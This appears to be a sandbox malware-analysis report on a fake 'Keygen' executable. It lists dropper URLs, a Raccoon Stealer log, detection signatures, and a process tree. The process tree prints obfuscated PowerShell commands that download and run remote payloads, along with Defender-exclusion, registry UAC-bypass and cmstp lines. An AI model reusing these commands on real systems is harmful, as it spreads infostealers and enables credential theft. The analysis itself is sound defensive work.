Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    147s
  • max time network
    163s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (63) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:28:57 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (476 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (63) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (63) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:112
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\46FF.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (63) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1880
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46FF.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1972
          • C:\Users\Public\zwg.exe
            "C:\Users\Public\zwg.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2416
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2560
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                PID:776
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 828
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2920
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2632
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                7⤵
                • Executes dropped EXE
                PID:2936
            • C:\Users\Public\zwg.exe
              "C:\Users\Public\zwg.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops desktop.ini file(s)
              • Modifies system certificate store
              PID:2696
              • C:\Users\Admin\AppData\Local\Temp\9l6CaXZdgU.exe
                "C:\Users\Admin\AppData\Local\Temp\9l6CaXZdgU.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2520
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                  "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\9l6CaXZdgU.exe"'
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1380
              • C:\Users\Admin\AppData\Local\Temp\2LPeiXBkXh.exe
                "C:\Users\Admin\AppData\Local\Temp\2LPeiXBkXh.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:1872
                • C:\Windows\SysWOW64\Notepad.exe
                  "C:\Windows\System32\Notepad.exe"
                  8⤵
                    PID:2716
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c C:\Users\Public\Natso.bat
                      9⤵
                        PID:2100
                        • C:\Windows\SysWOW64\reg.exe
                          reg delete hkcu\Environment /v windir /f
                          10⤵
                          • Modifies registry key
                          PID:1372
                        • C:\Windows\SysWOW64\reg.exe
                          reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                          10⤵
                          • Modifies registry key
                          PID:2244
                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      8⤵
                        PID:2364
                    • C:\Users\Admin\AppData\Local\Temp\SfgUR5zXYd.exe
                      "C:\Users\Admin\AppData\Local\Temp\SfgUR5zXYd.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of SetWindowsHookEx
                      PID:608
                      • \??\c:\windows\SysWOW64\cmstp.exe
                        "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\eir3105t.inf
                        8⤵
                          PID:2840
                      • C:\Users\Admin\AppData\Local\Temp\Lrq5FNKzOI.exe
                        "C:\Users\Admin\AppData\Local\Temp\Lrq5FNKzOI.exe"
                        7⤵
                        • Executes dropped EXE
                        • Windows security modification
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1484
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Get-MpPreference -verbose
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2932
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\zwg.exe"
                        7⤵
                          PID:760
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /T 10 /NOBREAK
                            8⤵
                            • Delays execution with timeout.exe
                            PID:2804
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46FF.tmp\m1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1832
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2000
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 1
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1856
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46FF.tmp\b.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1180
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
